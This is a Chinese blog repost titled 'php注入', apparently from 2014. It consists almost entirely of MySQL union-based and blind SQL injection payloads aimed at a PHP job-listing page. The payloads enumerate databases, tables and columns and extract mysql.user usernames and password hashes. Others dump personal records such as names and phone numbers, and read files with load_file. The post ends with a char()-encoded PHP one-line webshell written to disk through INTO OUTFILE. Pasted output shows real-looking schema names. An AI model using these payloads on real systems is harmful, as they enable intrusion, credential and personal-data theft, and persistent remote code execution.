码迷,mamicode.com
首页 > Web开发 > 详细

php注入

时间:2014-07-09 16:11:23      阅读:249      评论:0      收藏:0      [点我收藏+]

标签:des   http   数据   os   for   io   

1.判断是否存在注入,加‘;and 1=1;and 1=2
2.判断版本 and ord(mid(version(),1,1))>51 代替。
5.判断数据库连接帐号有没有写权限,and (select count(*) from mysql.user)>0 select1,concat(char(124,13,10),SCHEMA_NAME,char(124,13,10)),3,4,5,6,7,8,9,10,11,12,13,14,15 frominformation_schema.SCHEMA limit 0,1/*


先用union select 0,1,TABLE_NAME,3,4 FROM INFORMATION_SCHEMA.TABLES limit 0,1/*把所有的表暴出来
再用union select 0,1,COLUMN_NAME,3,4 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=要查询的表名17,1/*
屡试不爽
http://localhost/inject.php?id=1 and 1=2 union select concat(char(124,13,10),SCHEMA_NAME,char(124,13,10)),2,3,4,5,6,7,8 FROM INFORMATION_SCHEMA.TABLES where information_schema.SCHEMATA.SCHEMA_NAME=0x276773726327 limit 2,1


union select concat(char(124,13,10),TABLE_NAME,char(124,13,10)),2,3,4,5,6,7,8 FROM information_schema.SCHEMATA where information_schema.SCHEMATA.SCHEMA_NAME=0x276773726327

union select 1,2,load_file(‘c:\123.txt‘),4,5,6,into outfile‘123.php‘


/*相关信息查询
/job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),@@basedir,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 /* and 1=1

current_user() session_user() system_user() @@datadir @@tmpdir @@version_compile_os

job_detail.php?InfoId=347 and 1=2 union select 1,2,3,concat(char(94),char(94),char(94),user,char(94),char(94),char(94)),5,6,7,8 from (select * from (select * from mysql.user order by user limit 0,1) t order by user desc)t limit 1/* and 1=1
暴数据库用户名和密码
job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),user,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from mysql.user order by user limit 0,1) t order by user desc)t limit 1/* and 1=1

ob_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),password,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from mysql.user order by user limit 0,1) t order by user desc)t limit 1/* and 1=1

job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),user,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from mysql.user order by user limit 1,1) t order by user desc)t limit 1/* and 1=1

and 1=2 union select 1,concat(char(94),char(94),char(94),user,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from mysql.user order by user limit 4,1) t order by user desc)t limit 1/* and 1=1

/job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),count(*),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from information_schema.tables group by table_schema order by table_schema)t limit 1/* and 1=1

| TABLE_CATALOG | TABLE_SCHEMA | TABLE_NAME | TABLE_TYPE | ENGINE | VERSION | RO
W_FORMAT | TABLE_ROWS | AVG_ROW_LENGTH | DATA_LENGTH | MAX_DATA_LENGTH | INDEX_L
ENGTH | DATA_FREE | AUTO_INCREMENT | CREATE_TIME         | UPDATE_TIME         |
CHECK_TIME | TABLE_COLLATION | CHECKSUM | CREATE_OPTIONS | TABLE_COMMENT |
+---------------+--------------+------------+------------+--------+---------+---
---------+------------+----------------+-------------+-----------------+--------
------+-----------+----------------+---------------------+---------------------+
------------+-----------------+----------+----------------+---------------+
| NULL          | chinapiao    | air_city   | BASE TABLE | MyISAM |      10 | Dy
namic    |        884 |             39 |       34740 | 281474976710655 |
11264 |         0 |           1982 | 2009-04-09 21:22:59 | 2009-04-09 21:40:25 |
NULL       | utf8_general_ci |     NULL |                |               |
爆出所有库名
job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_schema,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables group by table_schema order by table_schema limit 0,1) t order by table_schema desc)t limit 1/* and 1=1
^^^information_schema^^^
job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_schema,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables group by table_schema order by table_schema limit 1,1) t order by table_schema desc)t limit 1/* and 1=1
^^^league^^^
job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_schema,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables group by table_schema order by table_schema limit 2,1) t order by table_schema desc)t limit 1/* and 1=1
^^^mysql^^^

用selelct查询语句查询数据库
inject.php?id=1 and (select ascii(substr(table_schema,8,1)) from (select * from (select * from information_schema.tables group by table_schema order by table_schema limit 3,1) t order by table_schema desc)t limit 1)>120 and 1=1
inject.php?id=1 and (select ascii(substr(table_schema,8,1)) from (select * from (select * from information_schema.tables group by table_schema order by table_schema limit 3,1) t order by table_schema desc)t limit 1)>116 and 1=1

/*暴表
跨库查询暴表
job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),cast(count(*) as char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from information_schema.tables where table_schema=0x6c6561677565 limit 1/* and 1=1
跨库查询暴列
/job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),cast(count(*) as char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from information_schema.columns where table_name=0x6962665f656d61696c5f6c6f6773 and table_schema=0x6c6561677565 limit 1/* and 1=1

job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),cast(count(*) as char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from information_schema.tables where table_schema=0x73697365 limit 1/* and 1=1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables where table_schema=0x73697365 order by table_schema limit 0,1) t order by table_schema desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables where table_schema=0x73697365 order by table_schema limit 1,1) t order by table_schema desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables where table_schema=0x73697365 order by table_schema limit 2,1) t order by table_schema desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables where table_schema=0x73697365 order by table_schema limit 3,1) t order by table_schema desc)t limit 1/* and 1=1 HTTP/1.1


/*暴列

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),cast(count(*) as char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from information_schema.columns where table_name=0x6d6174726963756c6174657232303035 and table_schema=0x73697365 limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),column_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.columns where table_name=0x6d6174726963756c6174657232303035 and table_schema=0x73697365 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),column_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.columns where table_name=0x6d6174726963756c6174657232303035 and table_schema=0x73697365 order by 1 limit 1,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

/job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),column_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.columns where table_name=0x6d6174726963756c6174657232303035 and table_schema=0x73697365 order by 1 limit 2,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1


/*猜解列值

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),cast(count(*) as char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from matriculater2005 where 1=1 limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),numberid,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),phone,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),linkman,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),specialityid,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),speciality,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

/*写入php一句话木马
<?require($_REQUEST[‘evil_file_path‘]);echo "zwell has been here"?>


GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(60),char(63),char(114),char(101),char(113),char(117),char(105),char(114),char(101),char(40),char(36),char(95),char(82),char(69),char(81),char(85),char(69),char(83),char(84),char(91),char(39),char(101),char(118),char(105),char(108),char(95),char(102),char(105),char(108),char(101),char(95),char(112),char(97),char(116),char(104),char(39),char(93),char(41),char(59),char(101),char(99),char(104),char(111),char(32),char(34),char(122),char(119),char(101),char(108),char(108),char(32),char(104),char(97),char(115),char(32),char(98),char(101),char(101),char(110),char(32),char(104),char(101),char(114),char(101),char(34),char(63),char(62),char(13),char(10)),1,1,1,1,1,1,1,1,1,1,1 into outfile ‘/etc/zwell.php‘/* and 1=1 HTTP/1.1

php注入,布布扣,bubuko.com

php注入

标签:des   http   数据   os   for   io   

原文地址:http://www.cnblogs.com/iDerr/p/3832062.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!